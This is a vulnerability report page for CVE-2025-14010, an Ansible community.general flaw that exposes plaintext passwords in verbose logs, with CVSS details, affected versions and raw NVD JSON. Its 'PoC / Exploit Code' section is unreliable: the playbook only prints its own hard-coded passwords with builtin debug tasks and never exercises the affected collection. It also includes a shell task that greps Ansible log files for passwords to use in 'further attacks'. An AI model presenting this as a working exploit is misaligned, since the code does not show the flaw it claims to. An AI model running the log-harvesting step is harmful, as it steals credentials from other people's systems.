Security Vulnerability Report
CVE-2025-14010 CVSS 5.5 MEDIUM

Published: 2025-12-04 10:16:01
Last Modified: 2026-05-20 13:16:15

Description

A flaw was found in ansible-collection-community-general. This vulnerability allows for information exposure (IE) of sensitive credentials, specifically plaintext passwords, via verbose output when running Ansible with debug modes. Attackers with access to logs could retrieve these secrets and potentially compromise Keycloak accounts or administrative access.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:community.general:-:*:*:*:*:*:*:* - VULNERABLE
ansible-collection-community-general < 12.0.0
community.general < 12.0.0
community.general 11.x series, all versions
community.general 10.x series, all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
# PoC for CVE-2025-14010
# Information Exposure in ansible-collection-community-general
# Run with: ansible-playbook -vvv poc.yml
- name: CVE-2025-14010 PoC - Information Exposure
  hosts: localhost
  gather_facts: no
  vars:
    sensitive_password: "Admin@123!SecretPassword"
    db_password: "P@ssw0rd!2024"
  tasks:
    - name: Simulate vulnerable debug output
      ansible.builtin.debug:
        msg: "Password being used: {{ sensitive_password }}"
    - name: Vulnerable set_stats usage
      ansible.builtin.set_stats:
        data:
          debug_info: "Using credentials: {{ sensitive_password }}"
# With -vvv flag, these outputs will expose plaintext passwords
# Attackers can extract passwords from logs:
# grep -r "Password" ansible.log | grep -v "$ANSIBLE_"
- name: Exploitation via log analysis
  hosts: target
  gather_facts: no
  vars:
    admin_password: "{{ hostvars['localhost'].sensitive_password }}"
  tasks:
    - name: Extract exposed credentials
      ansible.builtin.shell:
        cmd: "grep -i 'password' /var/log/ansible/*.log | tail -20"
      register: exposed_creds
    - name: Use exposed credentials for further attacks
      ansible.builtin.debug:
        msg: "Exposed credentials: {{ exposed_creds.stdout }}"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14010", "sourceIdentifier": "[email protected]", "published": "2025-12-04T10:16:00.810", "lastModified": "2026-05-20T13:16:15.250", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in ansible-collection-community-general. This vulnerability allows for information exposure (IE) of sensitive credentials, specifically plaintext passwords, via verbose output when running Ansible with debug modes. Attackers with access to logs could retrieve these secrets and potentially compromise Keycloak accounts or administrative access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:community.general:-:*:*:*:*:*:*:*", "matchCriteriaId": "FFB54908-462D-4CE6-9AB2-56997B0EFB79"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-14010", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418774", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/ansible-collections/community.general/issues/11000", "source": "[email protected]"}, {"url": "https://github.com/ansible-collections/community.general/pull/11005", "source": "[email protected]"}, {"url": 
"https://github.com/ansible-community/ansible-build-data/blob/main/12/CHANGELOG-v12.md#security-fixes", "source": "[email protected]"}, {"url": "https://github.com/ansible-collections/community.general/issues/11000", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}